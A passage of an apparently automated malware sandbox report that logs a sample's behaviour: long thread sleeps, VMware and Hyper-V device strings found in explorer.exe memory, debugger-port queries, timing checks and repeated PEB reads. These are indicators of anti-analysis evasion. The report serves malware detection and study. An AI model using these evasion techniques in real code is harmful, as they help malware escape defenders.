          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552Thread sleep time: -4680000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552Thread sleep count: 7633 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552Thread sleep time: -15266000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA51460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF67FA51460
          Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 00000006.00000002.4578095774.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: u}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4566997976.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
          Source: explorer.exe, 00000006.00000003.2980462538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000003.2979328846.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 00000006.00000003.2980462538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
          Source: explorer.exe, 00000006.00000000.2137414570.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000003.2979328846.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 00000006.00000003.2980462538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@r
          Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000003.2979328846.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C8550 mov eax, dword ptr fs:[00000030h]5_2_055C8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C8550 mov eax, dword ptr fs:[00000030h]5_2_055C8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FB570 mov eax, dword ptr fs:[00000030h]5_2_055FB570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FB570 mov eax, dword ptr fs:[00000030h]5_2_055FB570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F656A mov eax, dword ptr fs:[00000030h]5_2_055F656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F656A mov eax, dword ptr fs:[00000030h]5_2_055F656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F656A mov eax, dword ptr fs:[00000030h]5_2_055F656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB562 mov eax, dword ptr fs:[00000030h]5_2_055BB562
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]5_2_0566F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567B52F mov eax, dword ptr fs:[00000030h]5_2_0567B52F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F7505 mov eax, dword ptr fs:[00000030h]5_2_055F7505
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F7505 mov ecx, dword ptr fs:[00000030h]5_2_055F7505
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05695537 mov eax, dword ptr fs:[00000030h]5_2_05695537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]5_2_055EE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]5_2_055EE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]5_2_055EE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]5_2_055EE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]5_2_055EE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05656500 mov eax, dword ptr fs:[00000030h]5_2_05656500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]5_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]5_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]5_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]5_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]5_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]5_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]5_2_055CD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]5_2_055CD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]5_2_055CD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]5_2_055CD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]5_2_055CD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]5_2_055CD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]5_2_05694500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FD530 mov eax, dword ptr fs:[00000030h]5_2_055FD530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FD530 mov eax, dword ptr fs:[00000030h]5_2_055FD530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E95DA mov eax, dword ptr fs:[00000030h]5_2_055E95DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C65D0 mov eax, dword ptr fs:[00000030h]5_2_055C65D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA5D0 mov eax, dword ptr fs:[00000030h]5_2_055FA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA5D0 mov eax, dword ptr fs:[00000030h]5_2_055FA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE5CF mov eax, dword ptr fs:[00000030h]5_2_055FE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE5CF mov eax, dword ptr fs:[00000030h]5_2_055FE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F55C0 mov eax, dword ptr fs:[00000030h]5_2_055F55C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056955C9 mov eax, dword ptr fs:[00000030h]5_2_056955C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]5_2_055E15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]5_2_055E15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]5_2_055E15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]5_2_055E15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]5_2_055E15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]5_2_055E15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FC5ED mov eax, dword ptr fs:[00000030h]5_2_055FC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FC5ED mov eax, dword ptr fs:[00000030h]5_2_055FC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563D5D0 mov eax, dword ptr fs:[00000030h]5_2_0563D5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563D5D0 mov ecx, dword ptr fs:[00000030h]5_2_0563D5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]5_2_055EE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C25E0 mov eax, dword ptr fs:[00000030h]5_2_055C25E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056935D7 mov eax, dword ptr fs:[00000030h]5_2_056935D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056935D7 mov eax, dword ptr fs:[00000030h]5_2_056935D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056935D7 mov eax, dword ptr fs:[00000030h]5_2_056935D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056405A7 mov eax, dword ptr fs:[00000030h]5_2_056405A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056405A7 mov eax, dword ptr fs:[00000030h]5_2_056405A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056405A7 mov eax, dword ptr fs:[00000030h]5_2_056405A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE59C mov eax, dword ptr fs:[00000030h]5_2_055FE59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B758F mov eax, dword ptr fs:[00000030h]5_2_055B758F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B758F mov eax, dword ptr fs:[00000030h]5_2_055B758F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B758F mov eax, dword ptr fs:[00000030h]5_2_055B758F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F4588 mov eax, dword ptr fs:[00000030h]5_2_055F4588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567F5BE mov eax, dword ptr fs:[00000030h]5_2_0567F5BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C2582 mov eax, dword ptr fs:[00000030h]5_2_055C2582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C2582 mov ecx, dword ptr fs:[00000030h]5_2_055C2582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]5_2_056535BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]5_2_056535BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]5_2_056535BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]5_2_056535BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]5_2_055EF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E45B1 mov eax, dword ptr fs:[00000030h]5_2_055E45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E45B1 mov eax, dword ptr fs:[00000030h]5_2_055E45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564B594 mov eax, dword ptr fs:[00000030h]5_2_0564B594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564B594 mov eax, dword ptr fs:[00000030h]5_2_0564B594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]5_2_055E15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]5_2_055E15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]5_2_055E15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]5_2_055E15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]5_2_055E15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E245A mov eax, dword ptr fs:[00000030h]5_2_055E245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564C460 mov ecx, dword ptr fs:[00000030h]5_2_0564C460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B645D mov eax, dword ptr fs:[00000030h]5_2_055B645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569547F mov eax, dword ptr fs:[00000030h]5_2_0569547F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]5_2_055CB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]5_2_055CB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]5_2_055CB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]5_2_055CB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]5_2_055CB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]5_2_055CB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]5_2_055FE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EA470 mov eax, dword ptr fs:[00000030h]5_2_055EA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EA470 mov eax, dword ptr fs:[00000030h]5_2_055EA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EA470 mov eax, dword ptr fs:[00000030h]5_2_055EA470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567F453 mov eax, dword ptr fs:[00000030h]5_2_0567F453
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]5_2_055C1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]5_2_055C1460
